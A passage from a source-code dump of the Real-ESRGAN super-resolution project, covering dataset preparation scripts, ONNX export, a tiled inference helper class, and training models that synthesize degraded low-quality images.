os.path.relpath(img_path_gt, args.root[0]) img_name_lq = os.path.relpath(img_path_lq, args.root[1]) print(f'{img_name_gt}, {img_name_lq}') txt_file.write(f'{img_name_gt}, {img_name_lq}\n') if __name__ == '__main__': """This script is used to generate meta info (txt file) for paired images. 
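    A usage sketch (the folder and file names are simply the argparse defaults
    declared below):

        python scripts/generate_meta_info_pairdata.py \
            --input datasets/DF2K/DIV2K_train_HR_sub datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub \
            --meta_info datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt

    Each written line has the form "<gt_relative_path>, <lq_relative_path>", with the
    paths taken relative to the corresponding --root entries (or to the parent folders
    of the input folders when --root is left unset).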
""" parser = argparse.ArgumentParser() parser.add_argument( '--input', nargs='+', default=['datasets/DF2K/DIV2K_train_HR_sub', 'datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub'], help='Input folder, should be [gt_folder, lq_folder]') parser.add_argument('--root', nargs='+', default=[None, None], help='Folder root, will use the ') parser.add_argument( '--meta_info', type=str, default='datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt', help='txt path for meta info') args = parser.parse_args() assert len(args.input) == 2, 'Input folder should have two elements: gt folder and lq folder' assert len(args.root) == 2, 'Root path should have two elements: root for gt folder and lq folder' os.makedirs(os.path.dirname(args.meta_info), exist_ok=True) for i in range(2): if args.input[i].endswith('/'): args.input[i] = args.input[i][:-1] if args.root[i] is None: args.root[i] = os.path.dirname(args.input[i]) main(args) File: scripts/generate_meta_info.py import argparse import cv2 import glob import os def main(args): txt_file = open(args.meta_info, 'w') for folder, root in zip(args.input, args.root): img_paths = sorted(glob.glob(os.path.join(folder, '*'))) for img_path in img_paths: status = True if args.check: # read the image once for check, as some images may have errors try: img = cv2.imread(img_path) except (IOError, OSError) as error: print(f'Read {img_path} error: {error}') status = False if img is None: status = False print(f'Img is None: {img_path}') if status: # get the relative path img_name = os.path.relpath(img_path, root) print(img_name) txt_file.write(f'{img_name}\n') if __name__ == '__main__': """Generate meta info (txt file) for only Ground-Truth images. It can also generate meta info from several folders into one txt file. """ parser = argparse.ArgumentParser() parser.add_argument( '--input', nargs='+', default=['datasets/DF2K/DF2K_HR', 'datasets/DF2K/DF2K_multiscale'], help='Input folder, can be a list') parser.add_argument( '--root', nargs='+', default=['datasets/DF2K', 'datasets/DF2K'], help='Folder root, should have the length as input folders') parser.add_argument( '--meta_info', type=str, default='datasets/DF2K/meta_info/meta_info_DF2Kmultiscale.txt', help='txt path for meta info') parser.add_argument('--check', action='store_true', help='Read image to check whether it is ok') args = parser.parse_args() assert len(args.input) == len(args.root), ('Input folder and folder root should have the same length, but got ' f'{len(args.input)} and {len(args.root)}.') os.makedirs(os.path.dirname(args.meta_info), exist_ok=True) main(args) File: scripts/extract_subimages.py import argparse import cv2 import numpy as np import os import sys from basicsr.utils import scandir from multiprocessing import Pool from os import path as osp from tqdm import tqdm def main(args): """A multi-thread tool to crop large images to sub-images for faster IO. opt (dict): Configuration dict. It contains: n_thread (int): Thread number. compression_level (int): CV_IMWRITE_PNG_COMPRESSION from 0 to 9. A higher value means a smaller size and longer compression time. Use 0 for faster CPU decompression. Default: 3, same in cv2. input_folder (str): Path to the input folder. save_folder (str): Path to save folder. crop_size (int): Crop size. step (int): Step for overlapped sliding window. thresh_size (int): Threshold size. Patches whose size is lower than thresh_size will be dropped. Usage: For each folder, run this script. Typically, there are GT folder and LQ folder to be processed for DIV2K dataset. 
After process, each sub_folder should have the same number of subimages. Remember to modify opt configurations according to your settings. """ opt = {} opt['n_thread'] = args.n_thread opt['compression_level'] = args.compression_level opt['input_folder'] = args.input opt['save_folder'] = args.output opt['crop_size'] = args.crop_size opt['step'] = args.step opt['thresh_size'] = args.thresh_size extract_subimages(opt) def extract_subimages(opt): """Crop images to subimages. Args: opt (dict): Configuration dict. It contains: input_folder (str): Path to the input folder. save_folder (str): Path to save folder. n_thread (int): Thread number. """ input_folder = opt['input_folder'] save_folder = opt['save_folder'] if not osp.exists(save_folder): os.makedirs(save_folder) print(f'mkdir {save_folder} ...') else: print(f'Folder {save_folder} already exists. Exit.') sys.exit(1) # scan all images img_list = list(scandir(input_folder, full_path=True)) pbar = tqdm(total=len(img_list), unit='image', desc='Extract') pool = Pool(opt['n_thread']) for path in img_list: pool.apply_async(worker, args=(path, opt), callback=lambda arg: pbar.update(1)) pool.close() pool.join() pbar.close() print('All processes done.') def worker(path, opt): """Worker for each process. Args: path (str): Image path. opt (dict): Configuration dict. It contains: crop_size (int): Crop size. step (int): Step for overlapped sliding window. thresh_size (int): Threshold size. Patches whose size is lower than thresh_size will be dropped. save_folder (str): Path to save folder. compression_level (int): for cv2.IMWRITE_PNG_COMPRESSION. Returns: process_info (str): Process information displayed in progress bar. """ crop_size = opt['crop_size'] step = opt['step'] thresh_size = opt['thresh_size'] img_name, extension = osp.splitext(osp.basename(path)) # remove the x2, x3, x4 and x8 in the filename for DIV2K img_name = img_name.replace('x2', '').replace('x3', '').replace('x4', '').replace('x8', '') img = cv2.imread(path, cv2.IMREAD_UNCHANGED) h, w = img.shape[0:2] h_space = np.arange(0, h - crop_size + 1, step) if h - (h_space[-1] + crop_size) > thresh_size: h_space = np.append(h_space, h - crop_size) w_space = np.arange(0, w - crop_size + 1, step) if w - (w_space[-1] + crop_size) > thresh_size: w_space = np.append(w_space, w - crop_size) index = 0 for x in h_space: for y in w_space: index += 1 cropped_img = img[x:x + crop_size, y:y + crop_size, ...] cropped_img = np.ascontiguousarray(cropped_img) cv2.imwrite( osp.join(opt['save_folder'], f'{img_name}_s{index:03d}{extension}'), cropped_img, [cv2.IMWRITE_PNG_COMPRESSION, opt['compression_level']]) process_info = f'Processing {img_name} ...' return process_info if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', type=str, default='datasets/DF2K/DF2K_HR', help='Input folder') parser.add_argument('--output', type=str, default='datasets/DF2K/DF2K_HR_sub', help='Output folder') parser.add_argument('--crop_size', type=int, default=480, help='Crop size') parser.add_argument('--step', type=int, default=240, help='Step for overlapped sliding window') parser.add_argument( '--thresh_size', type=int, default=0, help='Threshold size. 
Patches whose size is lower than thresh_size will be dropped.') parser.add_argument('--n_thread', type=int, default=20, help='Thread number.') parser.add_argument('--compression_level', type=int, default=3, help='Compression level') args = parser.parse_args() main(args) File: scripts/pytorch2onnx.py import argparse import torch import torch.onnx from basicsr.archs.rrdbnet_arch import RRDBNet def main(args): # An instance of the model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) if args.params: keyname = 'params' else: keyname = 'params_ema' model.load_state_dict(torch.load(args.input)[keyname]) # set the train mode to false since we will only run the forward pass. model.train(False) model.cpu().eval() # An example input x = torch.rand(1, 3, 64, 64) # Export the model with torch.no_grad(): torch_out = torch.onnx._export(model, x, args.output, opset_version=11, export_params=True) print(torch_out.shape) if __name__ == '__main__': """Convert pytorch model to onnx models""" parser = argparse.ArgumentParser() parser.add_argument( '--input', type=str, default='experiments/pretrained_models/RealESRGAN_x4plus.pth', help='Input model path') parser.add_argument('--output', type=str, default='realesrgan-x4.onnx', help='Output onnx path') parser.add_argument('--params', action='store_false', help='Use params instead of params_ema') args = parser.parse_args() main(args) File: scripts/generate_multiscale_DF2K.py import argparse import glob import os from PIL import Image def main(args): # For DF2K, we consider the following three scales, # and the smallest image whose shortest edge is 400 scale_list = [0.75, 0.5, 1 / 3] shortest_edge = 400 path_list = sorted(glob.glob(os.path.join(args.input, '*'))) for path in path_list: print(path) basename = os.path.splitext(os.path.basename(path))[0] img = Image.open(path) width, height = img.size for idx, scale in enumerate(scale_list): print(f'\t{scale:.2f}') rlt = img.resize((int(width * scale), int(height * scale)), resample=Image.LANCZOS) rlt.save(os.path.join(args.output, f'{basename}T{idx}.png')) # save the smallest image which the shortest edge is 400 if width < height: ratio = height / width width = shortest_edge height = int(width * ratio) else: ratio = width / height height = shortest_edge width = int(height * ratio) rlt = img.resize((int(width), int(height)), resample=Image.LANCZOS) rlt.save(os.path.join(args.output, f'{basename}T{idx+1}.png')) if __name__ == '__main__': """Generate multi-scale versions for GT images with LANCZOS resampling. It is now used for DF2K dataset (DIV2K + Flickr 2K) """ parser = argparse.ArgumentParser() parser.add_argument('--input', type=str, default='datasets/DF2K/DF2K_HR', help='Input folder') parser.add_argument('--output', type=str, default='datasets/DF2K/DF2K_multiscale', help='Output folder') args = parser.parse_args() os.makedirs(args.output, exist_ok=True) main(args) File: realesrgan/__init__.py # flake8: noqa from .archs import * from .data import * from .models import * from .utils import * from .version import * File: realesrgan/utils.py import cv2 import math import numpy as np import os import queue import threading import torch from basicsr.utils.download_util import load_file_from_url from torch.nn import functional as F ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) class RealESRGANer(): """A helper class for upsampling images with RealESRGAN. Args: scale (int): Upsampling scale factor used in the networks. It is usually 2 or 4. 
model_path (str): The path to the pretrained model. It can be urls (will first download it automatically). model (nn.Module): The defined network. Default: None. tile (int): As too large images result in the out of GPU memory issue, so this tile option will first crop input images into tiles, and then process each of them. Finally, they will be merged into one image. 0 denotes for do not use tile. Default: 0. tile_pad (int): The pad size for each tile, to remove border artifacts. Default: 10. pre_pad (int): Pad the input images to avoid border artifacts. Default: 10. half (float): Whether to use half precision during inference. Default: False. """ def __init__(self, scale, model_path, dni_weight=None, model=None, tile=0, tile_pad=10, pre_pad=10, half=False, device=None, gpu_id=None): self.scale = scale self.tile_size = tile self.tile_pad = tile_pad self.pre_pad = pre_pad self.mod_scale = None self.half = half # initialize model if gpu_id: self.device = torch.device( f'cuda:{gpu_id}' if torch.cuda.is_available() else 'cpu') if device is None else device else: self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device is None else device if isinstance(model_path, list): # dni assert len(model_path) == len(dni_weight), 'model_path and dni_weight should have the save length.' loadnet = self.dni(model_path[0], model_path[1], dni_weight) else: # if the model_path starts with https, it will first download models to the folder: weights if model_path.startswith('https://'): model_path = load_file_from_url( url=model_path, model_dir=os.path.join(ROOT_DIR, 'weights'), progress=True, file_name=None) loadnet = torch.load(model_path, map_location=torch.device('cpu')) # prefer to use params_ema if 'params_ema' in loadnet: keyname = 'params_ema' else: keyname = 'params' model.load_state_dict(loadnet[keyname], strict=True) model.eval() self.model = model.to(self.device) if self.half: self.model = self.model.half() def dni(self, net_a, net_b, dni_weight, key='params', loc='cpu'): """Deep network interpolation. ``Paper: Deep Network Interpolation for Continuous Imagery Effect Transition`` """ net_a = torch.load(net_a, map_location=torch.device(loc)) net_b = torch.load(net_b, map_location=torch.device(loc)) for k, v_a in net_a[key].items(): net_a[key][k] = dni_weight[0] * v_a + dni_weight[1] * net_b[key][k] return net_a def pre_process(self, img): """Pre-process, such as pre-pad and mod pad, so that the images can be divisible """ img = torch.from_numpy(np.transpose(img, (2, 0, 1))).float() self.img = img.unsqueeze(0).to(self.device) if self.half: self.img = self.img.half() # pre_pad if self.pre_pad != 0: self.img = F.pad(self.img, (0, self.pre_pad, 0, self.pre_pad), 'reflect') # mod pad for divisible borders if self.scale == 2: self.mod_scale = 2 elif self.scale == 1: self.mod_scale = 4 if self.mod_scale is not None: self.mod_pad_h, self.mod_pad_w = 0, 0 _, _, h, w = self.img.size() if (h % self.mod_scale != 0): self.mod_pad_h = (self.mod_scale - h % self.mod_scale) if (w % self.mod_scale != 0): self.mod_pad_w = (self.mod_scale - w % self.mod_scale) self.img = F.pad(self.img, (0, self.mod_pad_w, 0, self.mod_pad_h), 'reflect') def process(self): # model inference self.output = self.model(self.img) def tile_process(self): """It will first crop input images to tiles, and then process each tile. Finally, all the processed tiles are merged into one images. 
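        A worked example with illustrative numbers: for an input of height 1000 and
        width 1200 with tile_size=400, tiles_x = ceil(1200 / 400) = 3 and
        tiles_y = ceil(1000 / 400) = 3, so 9 tiles are run through the model one by
        one; each tile is read with an extra tile_pad margin (clamped at the image
        border) and only its unpadded region is written back into the output at the
        upscaled coordinates.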
Modified from: https://github.com/ata4/esrgan-launcher """ batch, channel, height, width = self.img.shape output_height = height * self.scale output_width = width * self.scale output_shape = (batch, channel, output_height, output_width) # start with black image self.output = self.img.new_zeros(output_shape) tiles_x = math.ceil(width / self.tile_size) tiles_y = math.ceil(height / self.tile_size) # loop over all tiles for y in range(tiles_y): for x in range(tiles_x): # extract tile from input image ofs_x = x * self.tile_size ofs_y = y * self.tile_size # input tile area on total image input_start_x = ofs_x input_end_x = min(ofs_x + self.tile_size, width) input_start_y = ofs_y input_end_y = min(ofs_y + self.tile_size, height) # input tile area on total image with padding input_start_x_pad = max(input_start_x - self.tile_pad, 0) input_end_x_pad = min(input_end_x + self.tile_pad, width) input_start_y_pad = max(input_start_y - self.tile_pad, 0) input_end_y_pad = min(input_end_y + self.tile_pad, height) # input tile dimensions input_tile_width = input_end_x - input_start_x input_tile_height = input_end_y - input_start_y tile_idx = y * tiles_x + x + 1 input_tile = self.img[:, :, input_start_y_pad:input_end_y_pad, input_start_x_pad:input_end_x_pad] # upscale tile try: with torch.no_grad(): output_tile = self.model(input_tile) except RuntimeError as error: print('Error', error) print(f'\tTile {tile_idx}/{tiles_x * tiles_y}') # output tile area on total image output_start_x = input_start_x * self.scale output_end_x = input_end_x * self.scale output_start_y = input_start_y * self.scale output_end_y = input_end_y * self.scale # output tile area without padding output_start_x_tile = (input_start_x - input_start_x_pad) * self.scale output_end_x_tile = output_start_x_tile + input_tile_width * self.scale output_start_y_tile = (input_start_y - input_start_y_pad) * self.scale output_end_y_tile = output_start_y_tile + input_tile_height * self.scale # put tile into output image self.output[:, :, output_start_y:output_end_y, output_start_x:output_end_x] = output_tile[:, :, output_start_y_tile:output_end_y_tile, output_start_x_tile:output_end_x_tile] def post_process(self): # remove extra pad if self.mod_scale is not None: _, _, h, w = self.output.size() self.output = self.output[:, :, 0:h - self.mod_pad_h * self.scale, 0:w - self.mod_pad_w * self.scale] # remove prepad if self.pre_pad != 0: _, _, h, w = self.output.size() self.output = self.output[:, :, 0:h - self.pre_pad * self.scale, 0:w - self.pre_pad * self.scale] return self.output @torch.no_grad() def enhance(self, img, outscale=None, alpha_upsampler='realesrgan'): h_input, w_input = img.shape[0:2] # img: numpy img = img.astype(np.float32) if np.max(img) > 256: # 16-bit image max_range = 65535 print('\tInput is a 16-bit image') else: max_range = 255 img = img / max_range if len(img.shape) == 2: # gray image img_mode = 'L' img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB) elif img.shape[2] == 4: # RGBA image with alpha channel img_mode = 'RGBA' alpha = img[:, :, 3] img = img[:, :, 0:3] img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) if alpha_upsampler == 'realesrgan': alpha = cv2.cvtColor(alpha, cv2.COLOR_GRAY2RGB) else: img_mode = 'RGB' img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # ------------------- process image (without the alpha channel) ------------------- # self.pre_process(img) if self.tile_size > 0: self.tile_process() else: self.process() output_img = self.post_process() output_img = output_img.data.squeeze().float().cpu().clamp_(0, 1).numpy() output_img = 
np.transpose(output_img[[2, 1, 0], :, :], (1, 2, 0)) if img_mode == 'L': output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2GRAY) # ------------------- process the alpha channel if necessary ------------------- # if img_mode == 'RGBA': if alpha_upsampler == 'realesrgan': self.pre_process(alpha) if self.tile_size > 0: self.tile_process() else: self.process() output_alpha = self.post_process() output_alpha = output_alpha.data.squeeze().float().cpu().clamp_(0, 1).numpy() output_alpha = np.transpose(output_alpha[[2, 1, 0], :, :], (1, 2, 0)) output_alpha = cv2.cvtColor(output_alpha, cv2.COLOR_BGR2GRAY) else: # use the cv2 resize for alpha channel h, w = alpha.shape[0:2] output_alpha = cv2.resize(alpha, (w * self.scale, h * self.scale), interpolation=cv2.INTER_LINEAR) # merge the alpha channel output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2BGRA) output_img[:, :, 3] = output_alpha # ------------------------------ return ------------------------------ # if max_range == 65535: # 16-bit image output = (output_img * 65535.0).round().astype(np.uint16) else: output = (output_img * 255.0).round().astype(np.uint8) if outscale is not None and outscale != float(self.scale): output = cv2.resize( output, ( int(w_input * outscale), int(h_input * outscale), ), interpolation=cv2.INTER_LANCZOS4) return output, img_mode class PrefetchReader(threading.Thread): """Prefetch images. Args: img_list (list[str]): A image list of image paths to be read. num_prefetch_queue (int): Number of prefetch queue. """ def __init__(self, img_list, num_prefetch_queue): super().__init__() self.que = queue.Queue(num_prefetch_queue) self.img_list = img_list def run(self): for img_path in self.img_list: img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED) self.que.put(img) self.que.put(None) def __next__(self): next_item = self.que.get() if next_item is None: raise StopIteration return next_item def __iter__(self): return self class IOConsumer(threading.Thread): def __init__(self, opt, que, qid): super().__init__() self._queue = que self.qid = qid self.opt = opt def run(self): while True: msg = self._queue.get() if isinstance(msg, str) and msg == 'quit': break output = msg['output'] save_path = msg['save_path'] cv2.imwrite(save_path, output) print(f'IO worker {self.qid} is done.') File: realesrgan/train.py # flake8: noqa import os.path as osp from basicsr.train import train_pipeline import realesrgan.archs import realesrgan.data import realesrgan.models if __name__ == '__main__': root_path = osp.abspath(osp.join(__file__, osp.pardir, osp.pardir)) train_pipeline(root_path) File: realesrgan/models/realesrnet_model.py import numpy as np import random import torch from basicsr.data.degradations import random_add_gaussian_noise_pt, random_add_poisson_noise_pt from basicsr.data.transforms import paired_random_crop from basicsr.models.sr_model import SRModel from basicsr.utils import DiffJPEG, USMSharp from basicsr.utils.img_process_util import filter2D from basicsr.utils.registry import MODEL_REGISTRY from torch.nn import functional as F @MODEL_REGISTRY.register() class RealESRNetModel(SRModel): """RealESRNet Model for Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. It is trained without GAN losses. It mainly performs: 1. randomly synthesize LQ images in GPU tensors 2. optimize the networks with GAN training. 
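    Note that, as stated above, no GAN losses are involved here; optimization follows
    the parent SRModel. The synthesized pairs pass through the training pair pool in
    _dequeue_and_enqueue, whose size is opt['queue_size'] (default 180) and must be
    divisible by the batch size: with a per-GPU batch of 12, for example, the pool
    holds 180 pairs and only starts dequeuing once it has been filled after
    180 / 12 = 15 iterations (the batch size here is illustrative).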
""" def __init__(self, opt): super(RealESRNetModel, self).__init__(opt) self.jpeger = DiffJPEG(differentiable=False).cuda() # simulate JPEG compression artifacts self.usm_sharpener = USMSharp().cuda() # do usm sharpening self.queue_size = opt.get('queue_size', 180) @torch.no_grad() def _dequeue_and_enqueue(self): """It is the training pair pool for increasing the diversity in a batch. Batch processing limits the diversity of synthetic degradations in a batch. For example, samples in a batch could not have different resize scaling factors. Therefore, we employ this training pair pool to increase the degradation diversity in a batch. """ # initialize b, c, h, w = self.lq.size() if not hasattr(self, 'queue_lr'): assert self.queue_size % b == 0, f'queue size {self.queue_size} should be divisible by batch size {b}' self.queue_lr = torch.zeros(self.queue_size, c, h, w).cuda() _, c, h, w = self.gt.size() self.queue_gt = torch.zeros(self.queue_size, c, h, w).cuda() self.queue_ptr = 0 if self.queue_ptr == self.queue_size: # the pool is full # do dequeue and enqueue # shuffle idx = torch.randperm(self.queue_size) self.queue_lr = self.queue_lr[idx] self.queue_gt = self.queue_gt[idx] # get first b samples lq_dequeue = self.queue_lr[0:b, :, :, :].clone() gt_dequeue = self.queue_gt[0:b, :, :, :].clone() # update the queue self.queue_lr[0:b, :, :, :] = self.lq.clone() self.queue_gt[0:b, :, :, :] = self.gt.clone() self.lq = lq_dequeue self.gt = gt_dequeue else: # only do enqueue self.queue_lr[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.lq.clone() self.queue_gt[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.gt.clone() self.queue_ptr = self.queue_ptr + b @torch.no_grad() def feed_data(self, data): """Accept data from dataloader, and then add two-order degradations to obtain LQ images. 
""" if self.is_train and self.opt.get('high_order_degradation', True): # training data synthesis self.gt = data['gt'].to(self.device) # USM sharpen the GT images if self.opt['gt_usm'] is True: self.gt = self.usm_sharpener(self.gt) self.kernel1 = data['kernel1'].to(self.device) self.kernel2 = data['kernel2'].to(self.device) self.sinc_kernel = data['sinc_kernel'].to(self.device) ori_h, ori_w = self.gt.size()[2:4] # ----------------------- The first degradation process ----------------------- # # blur out = filter2D(self.gt, self.kernel1) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, scale_factor=scale, mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob'] if np.random.uniform() < self.opt['gaussian_noise_prob']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range']) out = torch.clamp(out, 0, 1) # clamp to [0, 1], otherwise JPEGer will result in unpleasant artifacts out = self.jpeger(out, quality=jpeg_p) # ----------------------- The second degradation process ----------------------- # # blur if np.random.uniform() < self.opt['second_blur_prob']: out = filter2D(out, self.kernel2) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob2'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range2'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range2'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate( out, size=(int(ori_h / self.opt['scale'] * scale), int(ori_w / self.opt['scale'] * scale)), mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob2'] if np.random.uniform() < self.opt['gaussian_noise_prob2']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range2'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range2'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression + the final sinc filter # We also need to resize images to desired sizes. We group [resize back + sinc filter] together # as one operation. # We consider two orders: # 1. [resize back + sinc filter] + JPEG compression # 2. JPEG compression + [resize back + sinc filter] # Empirically, we find other combinations (sinc + JPEG + Resize) will introduce twisted lines. 
if np.random.uniform() < 0.5: # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) else: # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # clamp and round self.lq = torch.clamp((out * 255.0).round(), 0, 255) / 255. # random crop gt_size = self.opt['gt_size'] self.gt, self.lq = paired_random_crop(self.gt, self.lq, gt_size, self.opt['scale']) # training pair pool self._dequeue_and_enqueue() self.lq = self.lq.contiguous() # for the warning: grad and param do not obey the gradient layout contract else: # for paired training or validation self.lq = data['lq'].to(self.device) if 'gt' in data: self.gt = data['gt'].to(self.device) self.gt_usm = self.usm_sharpener(self.gt) def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): # do not use the synthetic process during validation self.is_train = False super(RealESRNetModel, self).nondist_validation(dataloader, current_iter, tb_logger, save_img) self.is_train = True File: realesrgan/models/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import model modules for registry # scan all the files that end with '_model.py' under the model folder model_folder = osp.dirname(osp.abspath(__file__)) model_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(model_folder) if v.endswith('_model.py')] # import all the model modules _model_modules = [importlib.import_module(f'realesrgan.models.{file_name}') for file_name in model_filenames] File: realesrgan/models/realesrgan_model.py import numpy as np import random import torch from basicsr.data.degradations import random_add_gaussian_noise_pt, random_add_poisson_noise_pt from basicsr.data.transforms import paired_random_crop from basicsr.models.srgan_model import SRGANModel from basicsr.utils import DiffJPEG, USMSharp from basicsr.utils.img_process_util import filter2D from basicsr.utils.registry import MODEL_REGISTRY from collections import OrderedDict from torch.nn import functional as F @MODEL_REGISTRY.register() class RealESRGANModel(SRGANModel): """RealESRGAN Model for Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. It mainly performs: 1. randomly synthesize LQ images in GPU tensors 2. optimize the networks with GAN training. """ def __init__(self, opt): super(RealESRGANModel, self).__init__(opt) self.jpeger = DiffJPEG(differentiable=False).cuda() # simulate JPEG compression artifacts self.usm_sharpener = USMSharp().cuda() # do usm sharpening self.queue_size = opt.get('queue_size', 180) @torch.no_grad() def _dequeue_and_enqueue(self): """It is the training pair pool for increasing the diversity in a batch. Batch processing limits the diversity of synthetic degradations in a batch. For example, samples in a batch could not have different resize scaling factors. 
Therefore, we employ this training pair pool to increase the degradation diversity in a batch. """ # initialize b, c, h, w = self.lq.size() if not hasattr(self, 'queue_lr'): assert self.queue_size % b == 0, f'queue size {self.queue_size} should be divisible by batch size {b}' self.queue_lr = torch.zeros(self.queue_size, c, h, w).cuda() _, c, h, w = self.gt.size() self.queue_gt = torch.zeros(self.queue_size, c, h, w).cuda() self.queue_ptr = 0 if self.queue_ptr == self.queue_size: # the pool is full # do dequeue and enqueue # shuffle idx = torch.randperm(self.queue_size) self.queue_lr = self.queue_lr[idx] self.queue_gt = self.queue_gt[idx] # get first b samples lq_dequeue = self.queue_lr[0:b, :, :, :].clone() gt_dequeue = self.queue_gt[0:b, :, :, :].clone() # update the queue self.queue_lr[0:b, :, :, :] = self.lq.clone() self.queue_gt[0:b, :, :, :] = self.gt.clone() self.lq = lq_dequeue self.gt = gt_dequeue else: # only do enqueue self.queue_lr[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.lq.clone() self.queue_gt[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.gt.clone() self.queue_ptr = self.queue_ptr + b @torch.no_grad() def feed_data(self, data): """Accept data from dataloader, and then add two-order degradations to obtain LQ images. """ if self.is_train and self.opt.get('high_order_degradation', True): # training data synthesis self.gt = data['gt'].to(self.device) self.gt_usm = self.usm_sharpener(self.gt) self.kernel1 = data['kernel1'].to(self.device) self.kernel2 = data['kernel2'].to(self.device) self.sinc_kernel = data['sinc_kernel'].to(self.device) ori_h, ori_w = self.gt.size()[2:4] # ----------------------- The first degradation process ----------------------- # # blur out = filter2D(self.gt_usm, self.kernel1) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, scale_factor=scale, mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob'] if np.random.uniform() < self.opt['gaussian_noise_prob']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range']) out = torch.clamp(out, 0, 1) # clamp to [0, 1], otherwise JPEGer will result in unpleasant artifacts out = self.jpeger(out, quality=jpeg_p) # ----------------------- The second degradation process ----------------------- # # blur if np.random.uniform() < self.opt['second_blur_prob']: out = filter2D(out, self.kernel2) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob2'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range2'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range2'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate( out, size=(int(ori_h / self.opt['scale'] * scale), int(ori_w / self.opt['scale'] * scale)), mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob2'] if np.random.uniform() < self.opt['gaussian_noise_prob2']: out = 
random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range2'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range2'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression + the final sinc filter # We also need to resize images to desired sizes. We group [resize back + sinc filter] together # as one operation. # We consider two orders: # 1. [resize back + sinc filter] + JPEG compression # 2. JPEG compression + [resize back + sinc filter] # Empirically, we find other combinations (sinc + JPEG + Resize) will introduce twisted lines. if np.random.uniform() < 0.5: # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) else: # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) # resize back + the final sinc filter 